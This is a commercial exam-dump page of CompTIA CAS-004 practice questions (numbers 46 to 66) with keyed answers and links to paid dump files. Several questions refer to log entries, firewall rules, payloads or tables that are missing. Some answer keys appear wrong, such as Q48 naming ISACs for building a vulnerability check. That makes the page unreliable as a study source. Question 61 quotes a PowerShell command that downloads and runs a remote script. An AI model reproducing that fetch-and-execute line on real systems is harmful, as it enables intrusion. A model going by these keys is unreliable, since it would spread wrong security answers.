GET Real CompTIA CAS-004 Exam Questions With 100% Refund Guarantee Nov 08, 2022
Get Special Discount Offer on CAS-004 Dumps PDF
For more information about the CompTIA CAS-004 Exam visit the following reference link:
CompTIA CAS-004 Exam's Reference link
NEW QUESTION 46
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?
- A. Implement input validation on the API.
- B. Implement geoblocking on the WAF.
- C. Implement rate limiting on the API.
- D. Implement OAuth 2.0 on the API.
Answer: C
NEW QUESTION 47
A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:
The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:
Which of the following is an appropriate security control the company should implement?
- A. Restrict directory permission to read-only access.
- B. Use server-side processing to avoid XSS vulnerabilities in path input.
- C. Parameterize a query in the path variable to prevent SQL injection.
- D. Separate the items in the system call to prevent command injection.
Answer: D
NEW QUESTION 48
A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.
Which of the following would be BEST suited to meet these requirements?
- A. ARF
- B. ISACs
- C. OVAL
- D. Node.js
Answer: B
NEW QUESTION 49
A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.
Which of the following would be BEST for the developer to perform? (Choose two.)
- A. Implement certificate-based authentication.
- B. Make the DACL read-only.
- C. Encrypt with 3DES.
- D. Utilize code signing by a trusted third party.
- E. Verify MD5 hashes.
- F. Compress the program with a password.
Answer: D,E
NEW QUESTION 50
Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure. Which of the must occur to ensure the integrity of the image?
- A. A duplicate copy of the image must be maintained
- B. A hash value of the image must be computed.
- C. The disk containing the image must be placed in a seated container.
- D. The image must be password protected against changes.
Answer: B
NEW QUESTION 51
A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.
Which of the following does the business's IT manager need to consider?
- A. The right to personal data erasure
- B. The availability of personal data
- C. The language of the web application
- D. The company's annual revenue
Answer: A
NEW QUESTION 52
A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead. The network comprises three VLANs:
The security engineer looks at the UTM firewall rules and finds the following:
Which of the following should the security engineer do to ensure IMAPS functions properly on the corporate user network?
- A. Create an IMAPS firewall rule to ensure email is allowed.
- B. Confirm the email server certificate is installed on the corporate computers.
- C. Make sure the UTM certificate is imported on the corporate computers.
- D. Contact the email service provider and ask if the company IP is blocked.
Answer: A
NEW QUESTION 53
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
Which of the following would BEST mitigate this vulnerability?
- A. Data encoding
- B. Network intrusion prevention
- C. CAPTCHA
- D. Input validation
Answer: D
NEW QUESTION 54
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect toauthorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
- A. A general VPN solution to the primary network
- B. NAC to control authorized endpoints
- C. FIM on the servers storing the data
- D. A jump box in the screened subnet
Answer: B
Explanation:
Explanation
Network Access Control (NAC) is used to bolster the network security by restricting the availability of network resources to managed endpoints that don't satisfy the compliance requirements of the Organization.
NEW QUESTION 55
An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network Which of the following solutions represents the BEST course of action to allow the contractor access?
- A. Establish a certification process for the vendor Allow certified vendors access to the VDI to monitor and maintain the HVAC equipment
- B. Add the vendor's equipment to the existing network Give the vendor access through the standard corporate VPN
- C. Create a dedicated segment with no access to the corporate network Implement dedicated VPN hardware for vendor access
- D. Give the vendor a standard desktop PC to attach the equipment to Give the vendor access through the standard corporate VPN
Answer: C
NEW QUESTION 56
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate.
This is an example of:
- A. legal hold.
- B. due care.
- C. e-discovery.
- D. due intelligence
Answer: C
NEW QUESTION 57
A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?
- A. Create an SLA for each application that states when the application will come back online and distribute this information to the business units.
- B. Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.
- C. Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.
- D. Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.
Answer: D
NEW QUESTION 58
A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.
Which of the following techniques would be BEST suited for this requirement?
- A. Provide the contractors with direct access to satellite telemetry data.
- B. Replace the associated hardware.
- C. Reduce link latency on the affected ground and satellite segments.
- D. Deploy SOAR utilities and runbooks.
Answer: D
NEW QUESTION 59
A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.
Which of the following encryption methods should the cloud security engineer select during the implementation phase?
- A. Proxy-based
- B. Storage-based
- C. Instance-based
- D. Array controller-based
Answer: B
Explanation:
We recommend that you encrypt your virtual hard disks (VHDs) to help protect your boot volume and data volumes at rest in storage, along with your encryption keys and secrets. Azure Disk Encryption helps you encrypt your Windows and Linux IaaS virtual machine disks. Azure Disk Encryption uses the industry-standard BitLocker feature of Windows and the DM-Crypt feature of Linux to provide volume encryption for the OS and the data disks. The solution is integrated with Azure Key Vault to help you control and manage the disk-encryption keys and secrets in your key vault subscription. The solution also ensures that all data on the virtual machine disks are encrypted at rest in Azure Storage. https://docs.microsoft.com/en-us/azure/security/fundamentals/iaas
NEW QUESTION 60
A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?
- A. Inherent
- B. Low
- C. Transferred
- D. Residual.
- E. Mitigated
Answer: D
NEW QUESTION 61
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
Which of the following security controls would have alerted and prevented the next phase of the attack?
- A. Antivirus and UEBA
- B. Reverse proxy and sandbox
- C. Forward proxy and MFA
- D. EDR and application approved list
Answer: D
Explanation:
An EDR and whitelist should protect from this attack.
NEW QUESTION 62
A company in the financial sector receives a substantial number of customer transaction requests via email.
While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but theCIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.
- A. Configuring the mall to quarantine incoming attachment automatically
- B. Increasing the cadence for antivirus DAT updates to twice daily
- C. Implementing application blacklisting
- D. Deploying host-based firewalls and shipping the logs to the SIEM
Answer: D
NEW QUESTION 63
A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:
Which of the following meets the budget needs of the business?
- A. Filter GHI
- B. Filter ABC
- C. Filter TUV
- D. Filter XYZ
Answer: A
NEW QUESTION 64
A company is preparing to deploy a global service.
Which of the following must the company do to ensure GDPR compliance? (Choose two.)
- A. Provide optional data encryption.
- B. Provide data deletion capabilities.
- C. Provide opt-in/out for marketing messages.
- D. Inform users regarding what data is stored.
- E. Provide alternative authentication techniques.
- F. Grant data access to third parties.
Answer: B,D
Explanation:
The main rights for individuals under the GDPR are to:
allow subject access
have inaccuracies corrected
have information erased
prevent direct marketing
prevent automated decision-making and profiling
allow data portability (as per the paragraph above)
source: https://www.clouddirect.net/11-things-you-must-do-now-for-gdpr-compliance/
NEW QUESTION 65
A security analyst is trying to identify the source of a recent data loss incident. The analyst has reviewed all the for the time surrounding the identified all the assets on the network at the time of the data loss. The analyst suspects the key to finding the source was obfuscated in an application. Which of the following tools should the analyst use NEXT?
- A. Software Decomplier
- B. Network enurrerator
- C. Log reduction and analysis tool
- D. Static code analysis
Answer: D
NEW QUESTION 66
......
What is the exam cost of CompTIA CAS-004 Exam Certification
The exam cost of CompTIA CAS-004 Exam Certification is $466 USD.
PDF Download CompTIA Test To Gain Brilliante Result!: https://www.guidetorrent.com/CAS-004-pdf-free-download.html
Provide Updated CompTIA CAS-004 Dumps as Practice Test and PDF: https://drive.google.com/open?id=1iwqQk2EoSGhWfkhMlEB8v-2xdiT7jAyq